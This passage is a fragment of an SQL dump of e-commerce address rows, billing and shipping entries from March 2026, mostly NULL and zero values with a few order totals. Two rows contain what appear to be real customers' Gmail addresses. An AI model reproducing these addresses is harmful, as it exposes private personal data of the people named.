(747, 556, '2026-03-03 06:33:29', '2026-03-03 06:33:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(748, 557, '2026-03-03 06:47:46', '2026-03-03 06:47:46', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(749, 557, '2026-03-03 06:47:46', '2026-03-03 06:47:46', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(750, 558, '2026-03-06 05:03:10', '2026-03-06 05:03:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(751, 558, '2026-03-06 05:03:10', '2026-03-06 05:03:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(752, 559, '2026-03-06 05:03:44', '2026-03-06 05:03:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(753, 559, '2026-03-06 05:03:44', '2026-03-06 05:03:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(754, 560, '2026-03-10 06:54:25', '2026-03-10 06:54:25', 128, 0, NULL, 'billing', 'em.u.vo.s.esexu.k58@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(755, 560, '2026-03-10 06:54:25', '2026-03-10 06:54:25', 128, 0, NULL, 'shipping', 'em.u.vo.s.esexu.k58@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(756, 561, '2026-03-12 21:19:20', '2026-03-12 21:19:20', 129, 0, NULL, 'billing', 'h.o.fa.f.u.p.a.r.7.8@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(757, 561, '2026-03-12 21:19:20', '2026-03-12 21:19:20', 129, 0, NULL, 'shipping', 'h.o.fa.f.u.p.a.r.7.8@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(758, 562, '2026-03-13 15:15:41', '2026-03-13 15:15:41', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(759, 562, '2026-03-13 15:15:41', '2026-03-13 15:15:41', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(760, 563, '2026-03-14 00:07:16', '2026-03-14 00:07:16', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(761, 563, '2026-03-14 00:07:16', '2026-03-14 00:07:16', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(762, 564, '2026-03-15 11:41:12', '2026-03-15 11:41:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(763, 564, '2026-03-15 11:41:12', '2026-03-15 11:41:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(764, 565, '2026-03-16 08:49:56', '2026-03-16 08:49:56', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(765, 565, '2026-03-16 08:49:56', '2026-03-16 08:49:56', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(766, 566, '2026-03-16 09:36:26', '2026-03-16 09:36:26', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(767, 566, '2026-03-16 09:36:26', '2026-03-16 09:36:26', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(768, 567, '2026-03-18 21:40:39', '2026-03-18 21:40:39', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(769, 567, '2026-03-18 21:40:39', '2026-03-18 21:40:39', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(770, 568, '2026-03-19 07:24:57', '2026-03-19 07:24:57', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(771, 568, '2026-03-19 07:24:57', '2026-03-19 07:24:57', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(772, 569, '2026-03-19 07:25:00', '2026-03-19 07:25:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(773, 569, '2026-03-19 07:25:00', '2026-03-19 07:25:00', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(774, 570, '2026-03-19 07:25:03', '2026-03-19 07:25:03', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(775, 570, '2026-03-19 07:25:03', '2026-03-19 07:25:03', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(776, 571, '2026-03-19 07:25:06', '2026-03-19 07:25:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(777, 571, '2026-03-19 07:25:06', '2026-03-19 07:25:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(778, 572, '2026-03-19 07:25:10', '2026-03-19 07:25:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(779, 572, '2026-03-19 07:25:10', '2026-03-19 07:25:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(780, 573, '2026-03-19 07:25:12', '2026-03-19 07:25:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(781, 573, '2026-03-19 07:25:12', '2026-03-19 07:25:12', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(782, 574, '2026-03-19 07:25:15', '2026-03-19 07:25:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(783, 574, '2026-03-19 07:25:15', '2026-03-19 07:25:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(784, 575, '2026-03-22 13:39:19', '2026-03-22 13:39:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(785, 575, '2026-03-22 13:39:19', '2026-03-22 13:39:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(786, 576, '2026-03-22 14:13:58', '2026-03-22 14:13:58', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(787, 576, '2026-03-22 14:13:58', '2026-03-22 14:13:58', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(788, 577, '2026-03-22 19:09:19', '2026-03-22 19:09:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(789, 577, '2026-03-22 19:09:19', '2026-03-22 19:09:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(790, 578, '2026-03-22 19:09:20', '2026-03-22 19:09:20', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(791, 578, '2026-03-22 19:09:20', '2026-03-22 19:09:20', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(792, 579, '2026-03-22 19:18:12', '2026-03-22 19:18:12', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
